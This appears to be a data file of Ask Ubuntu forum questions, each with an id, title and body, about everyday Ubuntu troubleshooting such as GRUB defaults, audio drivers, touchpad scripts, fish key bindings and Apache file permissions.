19930	how can i make a webmail be my default email client ?	i would have liked to make gmail be my default email client , or mail program . in that case i would be able to open a firefox window containing a new message writer , every time i click on a 'mailto : ' hyperlink . how should i do it ?
19936	how can i mirror/flip display output ?	for strange reasons best not asked , i have a projector plugged into my computer that is pointed at a mirror . so the computer image is displayed on a wall , but it is mirrored . in linux ( ubuntu ) i can go to display preferences and set the external monitor to have a rotated image . is there a clever way i could have it set to rotate/flip the image ?
19939	how to install an alternative display manager ?	i want to replace gdm with another display manager . i did aptitude install slim ( tried also xdm ) and got a possibility to configure which display manager should be used . but after the reboot the display manager did n't got started . the ubuntu-logo with the points simulating a progress goes on and on . if i press esc , i can see , that slim ( or xdm ) was started , but i can not see any login-screen . how can i use these alternative display managers ?
19940	newly added files do n't sync down	i added some files into my ubuntu one/my files folder on my desktop machine . i can see them in the u1 web ui . my laptop is connected to the same u1 account , and in the ubuntu one preference pane i can see it 's connected to the account . however , my new files never download . in syncdaemon.log i can see it checking a bunch of other existing files , and then the file ends with many repetitions of 2011-01-04 11:05:42,277 - ubuntuone.syncdaemon.main - note - -- -- mark ( state : < state : 'ready ' ( queues working_on_metadata connection 'not user with network ' ) > ; queues : metadata : 1 ; content : 0 ; hash : 0 , fsm-cache : hit=5086 miss=69 ) -- -- i do have a working network connection . what do i do now ?
19943	can my xubuntu installation be converted to standard ubuntu ?	i currently have xubuntu installed on my netbook , and i 'm considering converting it to the standard vanilla ubuntu . is this possible ? if so , how do i start ?
19949	how to have double click on title bar maximize/restore behavior ?	after installing emerald theme manager , double clicking title makes the window roll up and down . how can i restore the normal behavior of maximize/restore ?
19951	i can not change the grub default item from os-1 , but i can from os-2 ( dual-boot 10.04 on both )	my 10.04 system ( os-1 ) got into a tangle the other day , so i installed a second , dual-boot 10.04 ( os-2 ) , so that i could trouble-shoot the hung system ... in case it is relevant to my question , i 'll mention that since i got os-1 working again , it has shown a few battle wounds from its ordeal ( .. actually the ordeal was mine ... trying to figure it all out ; ) ... i lost some custom settings , but not all . ( for the curious : the hangup was caused by rsync writing 600 gb to os-1 's 320 gb drive.. the destination drive was unmounted at the time , and rsync dutifully wrote directly to /media/usb_back ; filling it to capacity ... i have since , ammended my script : ) because the dual-boot mbr was prepared by os-2 , it is first on the grub list.. however , i want os-1 to be the default os to boot ... from os-1 , i tried two methods to change the grub-menu 's defaule os . eg . directly editing /etc/default/grub ( then update-grub ) running 'startup manager ' ( then update-grub ) neither of these methods had any effect ... so i started os-2 , and tried method 1 ... it worked ! why can i not change the grub menu from os-1 ? .. or if it can be done , how ?
19954	how to set the monitor to its native resolution which is not listed in the resolutions list ?	after installing ubuntu 10.04 with my samsung syncmaster b2030 , native resolution ( 1600x900 ) is not found in the list of resolutions .
19957	how can i get the unity interface to work on my netbook ?	i have 10.10 installed on my netbook , but the unity interface that came with it does not seem to work . the top and side bar are missing and several graphical menus do n't work . i have tried updating my graphics card but have had no luck . any suggestions ?
19958	how can i change the `` timeout '' duration for nautilus `` find the filename as you type '' feature ?	i often get stalled by the long timeout while typing the first few letters of a file name in nautilus ... the current timeout seems to be 5 seconds . i 'd prefer 1 second ... ( as per item 2 on this page about response times ) i do n't use the mouse much , which means i either wait , or press escape , when i do n't find the file ... i realize that this is a feature to some , but i 'd rather not wait . is there any way to change this timeout behaviour ?
19962	error with missing wallpaper after remove unity from sudo command	after i paste these scripts into terminal , my wallpaper became white . sudo ln -s /etc/xdg/xdg-une/autostart/maximus-autostart.desktop /etc/xdg/autostart/ sudo ln -s /etc/xdg/xdg-une/autostart/netbook-launcher.desktop /etc/xdg/autostart/ sudo ln -s /usr/share/gconf/une/default/20_une-gconf-default /usr/share/gconf/defaults/ sudo ln -s /usr/share/gconf/une/mandatory/20_une-gconf-mandatory /usr/share/gconf/defaults/ sudo update-gconf-defaults help me , i dont know what [ -s ] for ? and how do i get my wallpaper back . best regards from newbie
19964	hard disk makes weird noises during installation	i got the same problem - installing ubuntu . my hard disk is also emitting certain weird noise . what other option do i have rather then replacing my hdd ? should i try installing ubuntu through usb . if yes how exactly should i go about with it ? thanking you in anticipation .
19969	will `` apt-get upgrade '' also upgrade my php version ?	will sudo apt-get upgrade also upgrade php from 5.2 to 5.3 on my ubuntu 9.04 ?
19970	alt+f2 ( run application ) does n't work for custom commands	in order to speed up android development , i 've edited my ~/.bashrc to add some paths to path : export path= $ { path } : /opt/android-sdk/tools : /opt/android-sdk/platform-tools this works just fine from the command line ( i can just type android and , no matter where i am , the android sdk and avd manager will start up just fine . however , if i try to type android in the alt+f2 dialog ( run application ) , it gives the following error : could not open location 'file : ///home/felix/android' error stating file '/home/felix/android ' : no such file or directory why is that ? what path does the run application dialog use ?
19973	how to configure phpmyadmin to access multiple servers ?	what is the ubuntu way to configure phpmyadmin so that i can use it to administer multiple mysql servers ? the database parameters are set in /etc/dbconfig-common/phpmyadmin.conf , but there 's only space in there for the connection parameters for a single server . i could hack it into /etc/phpmyadmin/config-db.php and /etc/phpmyadmin/config.inc.php , but i assume there has to be a more elegant way .
19979	how to restart nautilus without logging out ?	how do i just restart the nautilus after adding a nautilus script without having to log out .
19982	getting sigmatel stac9227 front audio jacks to work	i run ubuntu 10.10 on my intel dg965ry . my front audio ports do n't work in ubuntu , the rear one does . i never got it working earlier when i had ubuntu 10.04 but this time i am going to try it again . my codec is sigmatel stac9227 my alsa information is here . handy details : ! ! alsa version ! ! -- -- -- -- -- -- driver version : 1.0.23 library version : 1.0.23 utilities version : 1.0.23 ! ! loaded alsa modules ! ! -- -- -- -- -- -- -- -- -- - snd_hda_intel snd_hda_intel i know something that i will have to change the model of my module to make the front audio jack works but i could n't find a model related line in my alsa configuration file - /etc/modprobe.d/alsa-base.conf ( i was able to get to that point in ubuntu 10.04 , may be something has changed ) . how can i proceed from here ? edit : module details : module snd-hda-intel -- -- -- -- -- -- -- -- -- -- module for intel hd audio ( ich6 , ich6m , esb2 , ich7 , ich8 , ich9 , ich10 , pch , sch ) , ati sb450 , sb600 , r600 , rs600 , rs690 , rs780 , rv610 , rv620 , rv630 , rv635 , rv670 , rv770 , via vt8251/vt8237a , sis966 , uli m5461 [ multiple options for each card instance ] model - force the model name position_fix - fix dma pointer ( 0 = auto , 1 = use lpib , 2 = posbuf ) probe_mask - bitmask to probe codecs ( default = -1 , meaning all slots ) when the bit 8 ( 0x100 ) is set , the lower 8 bits are used as the `` fixed '' codec slots ; i.e . the driver probes the slots regardless what hardware reports back probe_only - only probing and no codec initialization ( default=off ) ; useful to check the initial codec status for debugging bdl_pos_adj - specifies the dma irq timing delay in samples . passing -1 will make the driver to choose the appropriate value based on the controller chip . patch - specifies the early `` patch '' files to modify the hd-audio setup before initializing the codecs . this option is available only when config_snd_hda_patch_loader=y is set . see hd-audio.txt for details . beep_mode - selects the beep registration mode ( 0=off , 1=on , 2= dynamic registration via mute switch on/off ) ; the default value is set via config_snd_hda_input_beep_mode kconfig . [ single ( global ) options ] single_cmd - use single immediate commands to communicate with codecs ( for debugging only ) enable_msi - enable message signaled interrupt ( msi ) ( default = off ) power_save - automatic power-saving timeout ( in second , 0 = disable ) power_save_controller - reset hd-audio controller in power-saving mode ( default = on ) this module supports multiple cards and autoprobe . see documentation/sound/alsa/hd-audio.txt for more details about hd-audio driver . each codec may have a model table for different configurations . if your machine is n't listed there , the default ( usually minimal ) configuration is set up . you can pass `` model= < name > '' option to specify a certain model in such a case . there are different models depending on the codec chip . the list of available models is found in hd-audio-models.txt the model name `` genric '' is treated as a special case . when this model is given , the driver uses the generic codec parser without `` codec-patch '' . it 's sometimes good for testing and debugging . if the default configuration does n't work and one of the above matches with your device , report it together with alsa-info.sh output ( with -- no-upload option ) to kernel bugzilla or alsa-devel ml ( see the section `` links and addresses '' ) . power_save and power_save_controller options are for power-saving mode . see powersave.txt for details . note 2 : if you get click noises on output , try the module option position_fix=1 or 2. position_fix=1 will use the sd_lpib register value without fifo size correction as the current dma pointer . position_fix=2 will make the driver to use the position buffer instead of reading sd_lpib register . ( usually sd_lpib register is more accurate than the position buffer . ) nb : if you get many `` azx_get_response timeout '' messages at loading , it 's likely a problem of interrupts ( e.g . acpi irq routing ) . try to boot with options like `` pci=noacpi '' . also , you can try `` single_cmd=1 '' module option . this will switch the communication method between hda controller and codecs to the single immediate commands instead of corb/rirb . basically , the single command mode is provided only for bios , and you wo n't get unsolicited events , too . but , at least , this works independently from the irq . remember this is a last resort , and should be avoided as much as possible ... more notes on `` azx_get_response timeout '' problems : on some hardwares , you may need to add a proper probe_mask option to avoid the `` azx_get_response timeout '' problem above , instead . this occurs when the access to non-existing or non-working codec slot ( likely a modem one ) causes a stall of the communication via hd-audio bus . you can see which codec slots are probed by enabling config_snd_debug_verbose , or simply from the file name of the codec proc files . then limit the slots to probe by probe_mask option . for example , probe_mask=1 means to probe only the first slot , and probe_mask=4 means only the third slot . the power-management is supported . possible models for my codec : stac9227/9228/9229/927x ======================= ref reference board ref-no-jd reference board without hp/mic jack detection 3stack d965 3stack 5stack d965 5stack + spdif 5stack-no-fp d965 5stack without front panel dell-3stack dell dimension e520 dell-bios fixes with dell bios setup volknob fixes with volume-knob widget 0x24 auto bios setup ( default ) unfortunately , i do n't have much idea of putting them to use . update : i tried every model listed for my codec but still could n't get it to work . options snd-hda-intel model=ref options snd-hda-intel model=ref-no-jd options snd-hda-intel model=3stack options snd-hda-intel model=5stack options snd-hda-intel model=5stack-no-fp options snd-hda-intel model=dell-3stack options snd-hda-intel model=dell-bios options snd-hda-intel model=volknob options snd-hda-intel model=auto i tried them one by one by putting it at the end of config file sudo gedit /etc/modprobe.d/alsa-base.conf after every change i force-reload alsa sudo alsa force-reload
19984	how do you change thunderbird temporary file storage ?	when i open a message with an attachment and choose to `` open '' the attachment , thunderbird downloads the attachment and saves it in /tmp and then opens it . for security reasons i would like to be able to change the directory where the file is saved from /tmp to somewhere ( i will use an encrypted volume ) . i can not find a setting in thunderbird to do this , does anyone know if this is possible ?
19986	no panel when i boot-up , after running `` remember currently running applications ''	as the question 's title says , i have no panel when i re-start ubuntu . it happened after i selected `` automatically remember running applications when logging off '' in system -- preferences -- startup applications -- options . i can manually start it via ( gnome-panel & ) in the terminal , bur aside from that , it refuses to start iself . ( i 've since disabled `` remember applications wehen logging off '' ) how can i get it working normally again ?
19987	recent unreliable wireless connection	recently , my internet connection over wireless has become unreliable , on both a dell laptop running ubuntu 10.04 as well as my desktop running ubuntu 10.10 . the problem does not seem to occur on a laptop running windows vista . the problem does not seem to occur on my openmoko freerunner ( running android 1.5 ) , though i hardly ever use this device to connect over wlan , so the problem may have just slipped by . this problem does not seem to appear when i boot into ubuntu 9.10 from a live cd ( more precisely , i was able to ping fu-berlin.de for an hour without any packet loss ) . under ubuntu 10.10 , i am experiencing about 33 % packet loss . on my main ubuntu desktop , i have tried the following wireless devices : a longshine pci card ( an old device with an rtl8180l chip ) a d-link dwl-510 pci card ( this device threw warnings in dmesg ) a usb device from msi ( us54ex ) . usually my wireless network shows up in the network manager with a normal signal strength , even when the connection speed is slow ( which happens often ) or the connection gets reset ( asking me to click connect to re-authenticate my wireless connection ) . i have observed this problem with a netgear kwgr614 router ( with the manufacturers firmware ) , as well as with a tp-link tl-wr741nd router running openwrt . taking a look at my routers logs , i find many instances of the following line : tuesday,04 jan 2011 03:53:01 [ tcp syn flood ] [ deny access policy matched , dropping packet ] i know that the netgear router is susceptible to denial of service attacks , as i have previously been able to disrupt its operation by putting an nmap scan into a while loop . i use wep on the netgear router and wpa on the tp-link to encrypt the wireless connections . i seemed to have been able to circumvent the problem for a while ( at least on my main machine running 10.10 ) by putting iwconfig wlan1 power off into my /etc/rc.local . ( thereby turning power management off on my wireless device . ) further testing has shown that this reduces packet loss to about 5 % . strangely though , power management is on by default in 9.10 ( where the connection worked fine ) , and it is already turned off on the laptop running 10.04 ( where i get a bad connection sometimes ) . ubuntu support suggested i try the backported wireless drivers , which seems to have gotten rid of the packet loss phenomenon , but pages are still loading very slowly , including the configuration page for my wireless router . i have now filed a bug on launchpad : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/704777
19988	how to sync google calendar and evolution mail ?	i am trying to sync google calendar with evolution email client . but i am not able to do so . i tried some of the steps given in web to include google calendar and infact i am able to see my entries that i created in google calendar problem is i can not save any new appointments entries to google calendar through evolution . please help me .
19994	ffmpeg options : -acodec libfaac -ab 192k produce 150kbit files ?	when i use ffmpeg to convert an audiofile with the option -acodec libfaac -ab 192k and use ffmpeg -i on that file afterwards to get the audio file information , it tells me bitrate : 152 kb/s why ist this ? do i miss something here ? if i want to convert a file with a bitrate of 192kb it should give me 192 kbit after the conversion , should n't it ? or : how do i get the 192 kbit rate then ?
19995	is music store successful ?	i am wondering how much money canonical gets from this store and some statistics ( how much songs have been bought , ... )
19997	when will ratings and review for ubuntu software center start ?	i remember there were announcements , that ubuntu software center should get a rating and review system . do n't know if these announcement were official , but i remember it was stated it could start before christmas . what 's the recent status of these new features ?
19999	how do you assign commands to keys in terminal ?	is there a solution to assign special key combinations to words in terminal use . for example the less command is very usefull and i use i a lot to pipe the output of another process through it . the idea would be to set up special key combinations that are only active in terminal use assigned to write different commands ? so pressing ctrl + l in terminal window could write | less or ctrl + g could stand for | grep note : i just mean adding the letters to commandline not execute the finally . a similar way what 's tabcompletion but more specific .
20003	how can i install firefox manually ?	possible duplicates : how do i install firefox 4 beta ? how to compile source code from a tarball ? how can i install firefox manually from firefox website ? ( .tar.bz2 )
20007	libgtk2.0-common fails to build with gdk-2.0.gir error , type reference 'gdkpixbuf ' not found	i 'm trying to build gtk , but it fails . here 's what i 'm doing : sudo apt-get build-dep libgtk2.0-common apt-get source libgtk2.0-common cd gtk+2.0-2.22.0/ gedit gtk/gtktreeview.c & # ... editing a few files ( or not , it 's the same error ) ./configure -- prefix=/usr make the compilation runs for a while and then quits : gdk-2.0.gir : error : type reference 'gdkpixbuf ' not found ... make : *** [ all ] error 2 what am i doing wrong ?
20010	battery loading state on commandline ?	sometimes the energy status applet on my gnome panel suddenly disappears . is there a simple command to print loading state of the battery at commandline ?
20011	keytouch remaps the delete key	i installed keytouch , but it decided that the delete key should be the keytouch hot key . so , when i pressed deleted , keytouch came up . next i uninstalled keytouch and now the delete key does n't do anything . is there any way to remap the delete key to actually delete ? notes : i tried reinstalling keytouch , and the same thing happens . keytouch does not allow the user to map the delete key . edit xev shows keycode 119 when i press the delete key xmodmap shows keycode 119 mapped to delete nosymbol delete running xmodmap -e `` keycode 119 = delete '' from the command line does not resolve the issue edit the delete key passes through correctly when using rdesktop .
20015	firefox application associations not working	no matter what changes i make to file associations ( actions ) in the 'applications ' tab in firefox , they 're totally ignored . for example , i set .wmv and .avi files to open with 'smplayer ' but when i download a file and double-click on it ( through the 'downloads ' window ) , it keeps opening with totem player . the default file associations through nautilus ( 'open with ' tab ) work fine , i.e . i 've set smplayer as the default player and when i double-click a video file it open correctly . i 've tried to delete and recreate mimetypes.rdf but that did n't help . any ideas on what else should i check ?
20016	gzip is not working after the pipeline	for some reason gzip does n't work . it gives me an empty file /usr/bin/mysqldump -- opt -u root -ppassword database > database.sql | gzip > database.sql.gz database.sql is correctly created and it has the correct size . however database.sql.gz is only 20kb and it contains an empty file . thanks
20024	add binding to fish that not auto executes the string ?	how do i set up a key binding in fish , so that fish understands not to execute the bindingstring after appending it to commandline but just appending it as string to commandline . i want to set up a binding that appends | less by pressing i.e . alt + y . it seems that by default fish understands the command to automatically execute . i.e . when i type ls on commandline and then would press alt + y it only should complete the command to look like this ls | less but still not executing it . i 'm trying something like this bind \ey `` \| less '' but fish does n't accept my syntax
20025	how to set the external monitor as the default monitor when dualmonitor is enabled ?	i have an ati radeon hd 2600 in my laptop . i connected a 23 '' external monitor via vga . but when i enable dualmonitor in system-preferences-monitors the internal monitor of my laptop is set as the default monitor . is there a way to change the default monitor to the external monitor without disabling the internal monitor ?
20031	do dpkg and apt-get install dependencies ?	i 've been wondering , is there a way to tell dpkg or apt-get that when i want to install a package also install all the dependencies it requires ? i installed a package using dpkg but it complained about some dependency issues so i had to manually search one by one , is there a better way to do this ?
20032	are there any todo list desktop widgets ?	are there any todo list / notepad desktop widgets ? bonus points if it can sync with google 's tasks list !
20034	differences between doublequotes `` `` , singlequotes ' ' and backticks â´ â´ on commandline ?	i often see tutorials on the web or posts on this site which make heavy use of the following characters at the command line . often it seems that they are used for pretty similar purposes . what are the differences between them when used on the command line or for shell programming ? for what purpose do i use which of them ? '' `` double quotes ' ' single quotes ` ` backticks
20049	does ubuntu desktop 32bit support more than 4gb memory with default installation ?	does ubuntu desktop 32 bit support more than 4gb memory without changing anything ( without having to activate pae via compiling kernel or anything similar ) . will installing the 32 bit ubuntu on the machine be enough to detect the additional memory automatically . if yes , will this work if i add more than 4gb with a 32bit ubuntu already with 4gb ram . one example would be to have 8gb ram with ubuntu 32 desktop . my motherboard supports up to 8gb ram and it has 32 bit and 64 bit support ( it is the intel dp35dp )
20051	no gui after install in vmplayer	i 'm experimenting with using both vmware player and virtualbox to run an ubuntu vm in win7 . i have the vb install of maverick working fine , with only a few quirks such as slow response in firefox scrolling and the occasional freeze . however , making backup copies of a vb machine for storage is really a pain , and so i would like to see how player works in the same situation . i created a new vm with 2gb ram & 30gb hard drive space . the install went smoothly , but every time i start the vm , no gui ever appears and i have no mouse control . it takes me to a screen with this text : ubuntu easy install : vmware player is installing vmware tools.. please wait i then get a login prompt and it goes to a standard cli interface . at this point , i have no mouse control at all . the cpu and memory gauge that i have as a win7 screenlet shows no changes and minimal hdd activity . the vmware site says to install the tools from a tarball , going to vm > install vmware tools , but i ca n't do that with no mouse control . any solutions ?
20052	how to see the actual memory and its properties ( slot position , size , speed ... )	i have 2 pcs . a laptop dv600 and an intel dp35dp . i want a command that shows me how many slots of memory i am using , the size , speed , etc.. for the moment the size of each would be good . maybe see if there are slot free to use .
20053	how to assign correct permissions to both webserver and svn users ?	i 've an issue with files ownerships . i have a drupal website and the `` files '' folder needs to be owned by `` www-data '' in order to let the users to upload files with php . however i 'm now using svn and i need all folders and files to be own by `` svnuser '' in order to work . so now , i guess i need to add both users to a group with proper permissions . i 'm not sure what exactly to do , could you tell me what are the exact necessary steps ? thanks
20057	external monitor on old dell 700m ?	okay , linux noob . i installed 10.04 on an old dell 700m in hopes of using it as a media center device . that seems to work great , except now it wo n't output to the external monitor . vga cable works fine , tv recognizes other computers fine , it 's the laptop that wo n't output . turns out that the 700m , unlike every other computer out there , does n't have a fn hotkey to switch monitors . the only way to do it in windows was to go through the control panel . in ubuntu , though , the monitor setup wo n't detect or recognize any monitors . the laptop display works fine , but i ca n't adjust or add anything . i did a little research and found suggestions for older ubuntu builds involving the xorg.conf . i tried one out , in spite of my unfamiliarity , and it 's screwed the whole display big time . i can fix that with a clean reinstall , that 's no problem , but i 'm cautious about editing xorg again . any suggestions ? thank you !
20062	why wo n't cairo-dock recognize the icons for chrome app links ?	in chrome , i 've used the 'create application shortcuts ' option to add links to apps on my desktop . the appear with their favicon , but when i move them to cairo-dock , the favicon is not recognized , and i 'm not sure where to find it .
20063	how can i stream music from a mac to ubuntu ?	i have a mac with all of my music on it in itunes . itunes has a feature called `` home sharing '' which allows someone to stream the content from one computer to another . is there a way to set this feature up in ubuntu ?
20066	issues installing synapse launcher	i am trying to install synapse launcher on my desktop . i am using these two commands : sudo add-apt-repository ppa : synapse-core/ppa sudo apt-get update & & sudo apt-get install synapse however i am getting an error with the second command saying e : some index files failed to download , they have been ignored , or old ones used instead . i presume this has something to do with my connection to the hosting servers . but what i do n't understand is the fact that synaptic is working it just seems to be something about that ppa . i do n't know what i am doing wrong as the commands are widely suggested around the web , but they do n't seem to work for me ! i would greatly appreciate some advice on this as it is proving to be very frustrating . many thanks , george
20068	sudo and startup script	i have a new asus 1215n and i need to digit commands to enable multitouch . no problem : i 've made a script . since this netbook also need manual activation of the wifi driver the complete script is : # ! /bin/bash # # list of synaptics device properties http : //www.x.org/archive/x11r7.5/doc/man/man4/synaptics.4.html # sect4 # list current synaptics device properties : xinput list-props ' '' synps/2 synaptics touchpad '' ' # sleep 5 # added delay ... xinput set-int-prop `` synps/2 synaptics touchpad '' `` device enabled '' 8 1 xinput -- set-prop -- type=int -- format=32 `` synps/2 synaptics touchpad '' `` synaptics two-finger pressure '' 4 xinput -- set-prop -- type=int -- format=32 `` synps/2 synaptics touchpad '' `` synaptics two-finger width '' 9 # below width 1 finger touch , above width simulate 2 finger touch . - value=pad-pixels xinput -- set-prop -- type=int -- format=8 `` synps/2 synaptics touchpad '' `` synaptics edge scrolling '' 1 1 0 # vertical , horizontal , corner - values : 0=disable 1=enable xinput -- set-prop -- type=int -- format=32 `` synps/2 synaptics touchpad '' `` synaptics jumpy cursor threshold '' 250 # stabilize 2 finger actions - value=pad-pixels # xinput -- set-prop -- type=int -- format=8 `` synps/2 synaptics touchpad '' `` synaptics tap action '' 0 0 0 0 1 2 3 # pad corners rt rb lt lb tap fingers 1 2 3 ( ca n't simulate more then 2 tap fingers afaik ) - values : 0=disable 1=left 2=middle 3=right etc . ( in ff 8=back 9=forward ) xinput -- set-prop -- type=int -- format=8 `` synps/2 synaptics touchpad '' `` synaptics two-finger scrolling '' 1 0 # vertical scrolling , horizontal scrolling - values : 0=disable 1=enable # xinput -- set-prop -- type=int -- format=8 `` synps/2 synaptics touchpad '' `` synaptics circular scrolling '' 1 # xinput -- set-prop -- type=int -- format=8 `` synps/2 synaptics touchpad '' `` synaptics circular scrolling trigger '' 3 sudo modprobe lib80211 sudo insmod /home/pitto/drivers/broadcom/wl.ko exit i 've saved the script , then put it in my home , then chmod +x scriptname and then added it to startup applications . then i did : sudo visudo and added this row : myusername all= ( all ) nopasswd : /home/scriptname rebooted and ... multitouch works but wifi not . when i manually launch the script it asks for sudo password so i thought it was because of modprobe and insmod commands and i 've added those commands to sudo visudo . nothing . what am i doing wrong ?
20070	what 's the difference between insmod and modprobe ?	are there any differences between insmod and modprobe ?
20073	how to collect all the `` txt '' and `` log '' files using find ?	i currently have this script : find . -iname '*.log ' -print0 | xargs -0 tar zcf $ file to collect all the `` *.log '' files from a given directory . i would like to modify it to include also all the `` .txt '' files but i do n't know how , this should be fairly simple right ?
20074	is there any program that show all hardware ?	is there any program that show all hardware ( e.g . graphic card nvidia geforce 9600gt , network card , and so on ) on your computer ?
20075	connecting yahoo mail with evolution	i am using ubuntu 10.10 and want to add my yahoo mail account to evolution , how can i do that there are many resources available but no step to step accurate guide is there
20077	dbus error when accessing ftp from nautilus	i always get this error when i click on a ftp bookmark in nautilus : '' dbus error org.freedesktop.dbus.error.invalidargs : mountpoint already registered '' when i click a second time it works ( not always ) . this is annoying and makes working with ftp servers no fun . is there any work-around for this problem ?
20082	how can i force fish to save new key bindings persistently after closing a terminal window ?	how can i force fish to save new key bindings persistently after closing a terminal window ? at the moment i have the problem : i open a terminal window , the default shell is fish . i add a key binding with : bind \eg functionname it works in the terminal window now i close terminal window open a new terminal window , again fish is default shell the binding does n't work any longer and does n't show up in output of fish -a
20092	evolution vs. webmail ?	is there any advantage to using evolution over webmail ? ( newbie gnu/linux user ! )
20093	problem installing eclipse-platform	i am trying to install the eclipse-platform package in a new ubuntu 10.10 and i am getting the following error ( via the ubuntu software center ) : failed to fetch http : //nz.archive.ubuntu.com/ubuntu/pool/universe/libs/libservlet2.4-java/libservlet2.4-java_5.0.30-12_all.deb 404 not found browsing to the mentioned url , i can obviously verify that the .deb file in question is missing . is the package broken , or is it just the nz mirror ?
20099	how can i speed up the graphic display on an hp mini 110 series ?	i have an hp mini 110 series , and i see that anything that involves grahics or window management is getting very slow . i have the usual 1gb of ram and the atom n450 processor . is there any special driver i should find for the graphics processor ? thanks : - ) jf
20100	how can i find out what kind of card reader i have ?	i have a card reader in my hp mini netbook , but when i insert a card in it , the card is not recognised at all , and so not mounted . does anyone know which kind of processor is used , and how i can get it working ? thanks : - )
20103	can not type with apple bluetooth keyboard	i am trying to install ubuntu 10.10 on my imac , but i can not type anything in the who are you ? stage . is there a way to fix this . i do n't own a usb keyboard , so i 'm kind of stuck .
20105	why should n't /var/www have chmod 777	when developing a page on a localhost , i sometimes get a `` permission denied '' error which i can solve by running chmod -r 777 /var/www . however , people are telling me that this is a bad idea for security reasons . why should n't /var/www have a chmod of 777 ?
20106	easy way to change apache www location	instead of chaning permissions to /var/www , installing nautilus permission related extensions or having to execute gksu i want to know an easy to do way of changing /var/www to another place like /home/cyrex/www for example . this way i save on doing all the permission related problems .
20109	mini.iso install on to diskless machine with nfs mounted volume	is it possible to install ubuntu directly to an nfs volume ? i 'd like to boot a diskless machine with a mini.iso image and run the installer . the only problem is i ca n't find a way to mount the nfs volume from the install/command line . has anyone done this before , or does the installer assume my machine has a disk drive ?
20111	no sound when running in parallels 6	i 'm getting no sound from my ubuntu 10.10 desktop install on parallels 6 . i have enabled user sound , and checked my inputs and outputs . i am using an imac 2.66ghz i5 .
20112	synaptics touchpad problem when disabling it and then enabling it	my girlfriend has an hp dv6000 . in ubuntu 10.10 32bit i use the synaptics on it and all is good but when i disable it and enable it the problem starts . when booting the problem was that the synaptics was not working i then made the changes describe in edit 2 . now when i press the disable button in the synaptics touchpad it disables the mouse and the keyboard . after enabled the keyboard keys and mouse clicks do not work . if i click on the panel below , for example the applications , places or system buttons the focus gets stuck there forever . i can open nautilus by clicking on it but i can not use the menus , the alt+f2 function , see the wireless connections , lower the sound through the panel , etc.. here comes the weird part . if i press ctrl+alt+f1 ( or any other tty for that matter ) and then come back to ctrl+alt+f7 where the gui is everything works perfect again . this started about a week ago but she told me right now . i checked dmesg which is for sometime now throwing some warnings about skipping edid probe do to cached edid but for what i could find out this did not create the problem in the start . note : i do not need to login when i do ctrl+alt+f1 i just need to change to another tty then come back to f7 . what could be causing this problem ? edit 1 - after a couple of tests , this is what happens or is added to /var/log/syslog when i change to ctrl+alt+f1 after the problem starts : jan 4 22:33:07 mary acpid : client 1234 [ 0:0 ] has disconnected jan 4 22:33:07 mary acpid : client connected from 1234 [ 0:0 ] jan 4 22:33:07 mary acpid : 1 client rule loaded edit 2 - i have solved the synaptics when booting up ( the problem was that it was not working at all ) by adding this to rc.local : rmmod psmouse modprobe psmouse proto=imps edit 3 - found two articles about the same problem : http : //ubuntuforums.org/showthread.php ? t=1470117 - / - https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-input-synaptics/+bug/549727/+index ? comments=all edit 4 - after some more tests i found maybe the problem ( not 100 % sure ) . when i click on the disable button in the synaptics touchpad it makes a change in the file : .gconf/desktop/gnome/peripherals/touchpad/ % gconf.xml and it makes false the following line : < entry name= '' touchpad_enabled '' mtime= '' 1294200522 '' type= '' bool '' value= '' false '' / > but when i enable it again it does not change the file . it leaves it false that is why i have to do ctrl+alt+f1 to activate it somehow . edit 5 - i made a file called touchpad.conf in /etc/modprobe.d with the following line : options psmouse proto=imps to test . it still did not work . update : the following hp models are affected by this problem on ubuntu 10.10 : hp dv6000 hp dv6500 hp dv9000 hp dv9200
20113	how to stop mod4-p from switching the display ?	i use ctrl-p very frequently to scroll backward in the command history , but i often mistype it as mod4-p , which is bound to the switch display function . i 've searched around keyboard shortcuts and compizconfig , etc. , but i could n't find where mod4-p is bound . what controls that ?
20117	automatically suspend if no one is logged in for 30 minutes	for a number of stationary machines here at the university , i would like to have a setup where the machines suspend themselves to save power 30 minutes after the last user logged out . how can that be done ?
20119	how do i subscribe to a bug ?	sometimes people tell me to subscribe to a launchpad bug so i can follow along it 's progress , how do i do this ?
20124	experiences with ubuntu one ?	i 'm currently testing several backup/sync services : dropbox , spideroak and ubuntu one . of them , dropbox is the winner hands down ; spideroak is nice too , but a bit more intrusive and unpredictable ( sometimes is slow in syncing some files , or does n't sync them at all ) . ubuntu one has promise , but i 've used it much less than the other two . i 'm thinking about buying a `` 20 pack '' and using ubuntu one as my only synchronization software . it 's the cheapest of them all ( 3 $ /month vs 10 $ in dropbox and spideroak ) , and 20gb of space is enough for me . my intention is to sync most of my $ home folder . all the computers i 'll connect will have ubuntu installed , so not being multiplatform does n't really matter to me . if its performance is as good as dropbox 's , i 'm sold . but i 'd like to gauge some experiences here first . is anyone using it seriously ? i.e. , to sync a lot of files that change often ( like the aforementioned $ home folder , program sources , or something alike ) . what have been your experiences ? thanks in advance .
20127	how to remove configuration files completely	recently i uninstalled some software using sudo apt-get -- purge autoremove , thinking that this would remove all traces of it including unused dependencies and configuration files . however i discovered that a configuration file was left behind in my home folder . is there a more powerful command which would remove even that ? also , is it safe to delete the hidden files and folders under home , if they are merely configuration files , or are there other kinds of files ?
20128	how do i boot to a windows recovery partition from grub on a toshiba computer ?	this should be simple but i can not figure out how to do it . i 've been dual booting ubuntu and vista for a while . about 8 months ago , i realized my windows partition got corrupted and would n't boot . this was n't a problem since i did n't need it anyway , but now i do need windows . using the disk manager i can see a partition called toshiba system volume which is 1.6 gb and one called hdd recovery which is 7.8 gb . i assume the second one is what i need and i 'm not sure what the first one is for . anyway , how do i boot to this one ? is it a matter of configuring grub to boot to it ? once i do boot to it will it let me only reformat my windows partition , or is it going to restore the entire hard drive to factory condition ? i assume i 'll get the general windows installer which lets me choose the partition but , as you can probably tell , i 've never used a recover partition . should i burn the contents of the partition to a disk and boot to that ? sorry if this is obvious but i 'm confused and can not figure this out .
20131	how to disable expand animation on appearance of cairo dock ?	i have set visibility of main dock to hide , so whenever i move the move to bottom of screen , dock appears with expand animation . how to make dock just appear with any animation like docky or awn ?
20132	transfer an image file of more than 5gb	i am trying to upload an image file of about 5-6 gb . i therefore bought more space on my cloud but when trying to upload the file it does not work . why ? have tried with safari and firefox , same result , uploading appears but no data transfer . thank you . frederic
